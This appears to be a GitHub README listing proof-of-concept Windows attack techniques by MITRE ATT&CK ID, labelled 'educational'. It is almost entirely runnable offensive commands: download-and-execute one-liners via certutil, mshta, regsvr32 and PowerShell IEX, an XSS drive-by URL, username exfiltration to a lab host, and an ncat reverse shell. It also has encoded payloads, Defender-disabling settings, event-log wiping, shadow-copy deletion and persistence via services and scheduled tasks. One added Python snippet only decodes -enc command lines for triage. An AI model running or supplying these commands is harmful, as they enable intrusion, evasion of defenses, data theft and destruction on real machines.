Disclaimer: This project is for Educational Purposes Only
This repository stores proof-of-concept Windows malware techniques, categorized by MITRE ATT&CK technique ID.
For Linux, please visit malware-kiddie-linux.
Abbreviation | Name |
---|---|
CHM (T1223) | Compiled HTML |
COM | Component Object Model |
DDE (T1173) | Dynamic Data Exchange |
HTA | HTML Application |
Drive-by Compromise (T1189)
http://demo.testfire.net/search.jsp?query=%3Cscript%3E+var+link+%3D+document.createElement%28%27a%27%29%3B+link.href+%3D+%27http%3A%2F%2F192.168.56.1%2Fvirus.exe%27%3B+link.download+%3D+%27%27%3B+document.body.appendChild%28link%29%3B+link.click%28%29%3B+%3C%2Fscript%3E
Certutil (T1105)
certutil -urlcache -split -f http://192.168.56.1/virus.exe C:\Users\IEUser\Desktop\virus.exe
Background Intelligent Transfer Service (BITSAdmin) (T1105)
bitsadmin /transfer virus /download /priority high http://192.168.56.1/virus.exe C:\Users\IEUser\Desktop\virus.exe
#Powershell
Start-BitsTransfer -Source http://192.168.56.1/virus.exe -Destination C:\Users\IEUser\Desktop\virus.exe
PowerShell
iwr http://192.168.56.1/virus.exe -OutFile virus.exe
wget http://192.168.56.1/virus.exe -O virus.exe
invoke-webrequest http://192.168.56.1/virus.exe -outfile virus.exe
Microsoft Antimalware Service Command Line Utility
"C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2008.9-0\MpCmdRun.exe" -url http://192.168.56.1/virus.exe -path C:\Users\IEUser\Desktop\virus.exe
COM (T1117)
regsvr32.exe /u /n /s /i:http://192.168.56.102/ActiveXObject.sct scrobj.dll
COM (HTA) (T1085)
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();GetObject("script:http://192.168.56.102/ActiveXObject.wsc");
COM (HTA) (T1170)
mshta javascript:document.write();GetObject("script:http://192.168.56.102/ActiveXObject.wsc");
XSL (T1220)
wmic process list /FORMAT:ActiveXObject.xsl
XSL (T1220)
wmic os get /FORMAT:"http://192.168.56.102/ActiveXObject.xsl"
MSBuild
wmic process call create "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe RunExecutable.csproj"
C# Compiler
Method 1: csc.exe
"C:\Windows\Microsoft.NET\Framework\v3.5\csc.exe" ConsoleApp.cs && ConsoleApp.exe
"C:\Program Files (x86)\MSBuild\14.0\Bin\csc.exe" ConsoleApp.cs && ConsoleApp.exe
Method 2: Powershell
powershell -command "$cp = New-Object System.CodeDom.Compiler.CompilerParameters; $cp.GenerateInMemory = $true; $cp.ReferencedAssemblies.AddRange(@("""System.dll""", [PsObject].Assembly.Location)); $code = 'public class App { public static void Main(){ System.Diagnostics.Process.Start("""calc.exe"""); } }';$provider = [System.CodeDom.Compiler.CodeDomProvider]::CreateProvider("""CSharp""").CompileAssemblyFromSource($cp, $code); $instance = $provider.CompiledAssembly.CreateInstance("""App"""); $instance.GetType().GetMethod("""Main""").Invoke($instance, $null);"
C Compiler
"C:\Program Files (x86)\Microsoft Visual Studio\2017\Community\Common7\Tools\vsdevcmd"
cl ConsoleApp.c && ConsoleApp.exe && del ConsoleApp.obj && del ConsoleApp.exe
VBScript (.vbs)
Dim command,shell
command = "pow" & "ershell calc"
Set shell = CreateObject("WScript.Shell")
shell.Run command,0
Rundll32 (T1085)
rundll32 advpack.dll, #-1152921504606846964 calc.exe
Signed Binary Proxy Execution (T1218)
msfvenom -f msi -p windows/exec CMD=powershell.exe > powershell.png
msiexec /q /i http://192.168.56.102/powershell.png
Windows Update AutoUpdate Client
wuauclt.exe /UpdateDeploymentProvider virus.dll /RunHandlerComServer
Run VB script with cloned cmd.exe
C:\Windows\System32\cmd.exe /c copy C:\Windows\System32\cmd.exe %appdata%\clone.exe /Y && echo 2 >> %appdata%\clone.exe && %appdata%\clone.exe /c start mshta "http://192.168.56.1/VBscript.php"
%COMSPEC% /b /c calc
Variable | Path |
---|---|
%COMSPEC% | C:\WINDOWS\system32\cmd.exe |
Run Powershell scripts hosted on web
powershell.exe -nop -NoProfile -WindowStyle 1 -c IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/4f645CDG')
[void][System.Reflection.Assembly]::LoadWithPartialName('Microsoft.VisualBasic');[Microsoft.VisualBasic.Interaction]::CallByName((New-Object Net.WebClient),'D$x$ownloadStr$x$ing'.replace('$x$', ''),[Microsoft.VisualBasic.CallType]::Method,'https://paste$x$bin.com/raw/4f645CDG'.replace('$x$', '')) | IEX;
Download and open file
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();r=new%20ActiveXObject("WScript.Shell").run("powershell -WindowStyle hidden -nologo -noprofile -ExecutionPolicy Bypass IEX (New-Object System.Net.WebClient).DownloadFile('https://secure.eicar.org/eicar.com.txt', '..\\eicar.exe');&cmd /c notepad ..\\eicar.exe",0,true);
Resource Exhaustion
echo off && for /f "tokens=1" %a in ('dir/s/b *.txt') do (notepad "%a")
Task Scheduler (T1053)
schtasks /create /tn "virus" /tr C:\Users\IEUser\Desktop\virus.exe /sc minute /mo 1
schtasks /delete /tn "virus" /f
LNK (T1023)
C:\Windows\System32\cmd.exe /k echo off && echo X5O!P%@AP[4\\PZX54(P^^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* > C:\\Users\\IEUser\\Desktop\\g4xyk.exe && exit
Service Registry Permissions Weakness (T1058)
sc.exe create malwareService binPath="%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -encodedcommand KABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQB4AGEAbQBwAGwAZQAuAGMAbwBtACIAKQAuAEwAaQBuAGsAcwAuAEgAcgBlAGYA
sc start malwareService
#sc delete malwareService
Remark: Although the error "The service did not respond to the start or control request in a timely fashion." is shown, the HTTP request is still sent to the target server before the service is killed.
Rundll
rundll32 url.dll,FileProtocolHandler http://192.168.56.102/?c=%USERNAME%
echo %USERNAME% > tmp && set /p Value=<tmp && rundll32 url.dll,FileProtocolHandler http://192.168.56.102/?c=%Value%
Explorer
explorer "http://192.168.56.102/?c=%USERNAME%"
Internet Explorer
"C:\Program Files\internet explorer\iexplore.exe" -private -extoff http://192.168.56.102/?c=%USERNAME% && sleep 3 && taskkill /IM "iexplore.exe" /F
File Deletion (T1107)
sdelete -s c:\temp
Indicator Removal on Host (T1070)
for /f %%x in ('wevtutil el') do wevtutil cl "%%x"
Obfuscated Files or Information (T1027)
Powershell:
'DEX'.replace('D','I'); #IEX
C:\Windows\Syste%ALLUSERSPROFILE:~9,1%32\cmd.exe /c copy C:\Windows\Syste%ALLUSERSPROFILE:~9,1%32\cmd.exe "%appdata%\clone.exe" /Y && echo 2 >> "%appdata%/clone.exe" && "%appdata%\clone.exe" /c start %ALLUSERSPROFILE:~9,1%sht%ALLUSERSPROFILE:~8,1% "http://192.168.56.1/VBsc%ALLUSERSPROFILE:~7,1%ipt.php"
String | Output |
---|---|
%ALLUSERSPROFILE% | C:\ProgramData |
%ALLUSERSPROFILE:~9,1% | m |
%ALLUSERSPROFILE:~8,1% | a |
%ALLUSERSPROFILE:~7,1% | r |
powershell.exe -nop -NoProfile -WindowStyle 1 -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwBwAGEAcwB0AGUAYgBpAG4ALgBjAG8AbQAvAHIAYQB3AC8ANABmADYANAA1AEMARABHACcAKQA=
[Convert]::ToBase64String( [System.Text.Encoding]::Unicode.GetBytes("IEX (New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/4f645CDG')"))
Command | Encoded Command |
---|---|
calc.exe | YwBhAGwAYwAuAGUAeABlAA== |
(Invoke-WebRequest -Uri "http://www.example.com").Links.Href | KABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAIgBoAHQAdABwADoALwAvAHcAdwB3AC4AZQB4AGEAbQBwAGwAZQAuAGMAbwBtACIAKQAuAEwAaQBuAGsAcwAuAEgAcgBlAGYA |
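As an added defender-side example (not code from this repository), the Python below reproduces the UTF-16LE base64 encoding shown above and decodes the -enc / -encodedcommand argument out of a process command line, as one would when triaging process-creation logs; the sample command line is constructed.

```python
import base64
import re
from typing import Optional

# Constructed sample command line (not from the repository) in the shape the
# README shows: an -encodedcommand argument carrying UTF-16LE base64.
SAMPLE_CMDLINE = "powershell.exe -nop -w hidden -encodedcommand YwBhAGwAYwAuAGUAeABlAA=="

# PowerShell accepts -e, -ec, -enc and -encodedcommand (case-insensitive).
_ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")


def encode_powershell_command(command: str) -> str:
    """Same transform as [Convert]::ToBase64String(Unicode.GetBytes(...)):
    UTF-16LE bytes, then standard base64. This is the -enc format."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_powershell_command(encoded: str) -> str:
    """Reverse of the above. Raises ValueError on invalid base64 or on a byte
    count that cannot be UTF-16LE, so garbage is reported rather than guessed."""
    raw = base64.b64decode(encoded, validate=True)
    if len(raw) % 2:
        raise ValueError("odd byte count: not UTF-16LE")
    return raw.decode("utf-16-le")


def extract_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script hidden in a command line, or None if the
    line carries no encoded command or the blob does not decode."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return decode_powershell_command(m.group(1))
    except ValueError:  # binascii.Error is a ValueError subclass
        return None


if __name__ == "__main__":
    print(extract_encoded_command(SAMPLE_CMDLINE))
```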
Impair Defenses (T1562)
Preferences for the Windows Defender scans and updates
Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
Custom Command and Control Protocol (T1094)
Server:
git clone https://github.com/inquisb/icmpsh.git
sysctl -w net.ipv4.icmp_echo_ignore_all=1
./icmpsh_m.py <Server IP> <Client IP>
Client:
icmpsh.exe -t <Server IP>
Standard Cryptographic Protocol (T1032)
Method 1: SSH tunnel with plink
Step 1: Server
leafpad /etc/ssh/sshd_config
Port 443
service ssh restart
Step 2: Client
plink.exe -P 443 -l root -pw toor -C -R 8080:127.0.0.1:3389 <Server IP>
Download: plink
Step 3: Server
rdesktop 127.0.0.1:8080
Method 2: ncat over SSL
Step 1: Server
ncat -nvlp 8080 --ssl
Step 2: Client
ncat -nv <Server IP> 8080 -e cmd.exe --ssl
Proxy (T1090)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyEnable /t REG_DWORD /d 1 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer /t REG_SZ /d 192.168.56.1:8099 /f
File and Directory Discovery (T1083)
Powershell:
$p = "C:\Users\" + $env:UserName + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\1.txt"
$pathExist = [System.IO.File]::Exists($p)
if($pathExist -eq $true){ notepad $p }
- C:\Users\Public
- %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
- %TEMP%
- %SystemRoot%\system32\
- C:\Users\%USERNAME%\Downloads\
- C:\$Recycle.Bin
Screen Capture (T1113)
Powershell:
$ScreenWidth = (Get-WmiObject -Class Win32_DesktopMonitor).ScreenWidth
$ScreenHeight = (Get-WmiObject -Class Win32_DesktopMonitor).ScreenHeight
[Reflection.Assembly]::LoadWithPartialName("System.Drawing")
function screenshot([Drawing.Rectangle]$bounds, $path) {
$bmp = New-Object Drawing.Bitmap $bounds.width, $bounds.height
$graphics = [Drawing.Graphics]::FromImage($bmp)
$graphics.CopyFromScreen($bounds.Location, [Drawing.Point]::Empty, $bounds.size)
$bmp.Save($path)
$graphics.Dispose()
$bmp.Dispose()
}
$bounds = [Drawing.Rectangle]::FromLTRB(0, 0, $ScreenWidth,$ScreenHeight)
screenshot $bounds "C:\Users\IEUser\Desktop\screenshot.png"
Inhibit System Recovery (T1490)
vssadmin.exe Delete Shadows /All /Quiet
Sending Keystrokes to an Application
Powershell:
$wshell = New-Object -ComObject wscript.shell
$wshell.AppActivate('Mozilla Firefox')
$wshell.SendKeys('{CAPSLOCK}')
$wshell.SendKeys('www.google.com')
$wshell.SendKeys('~')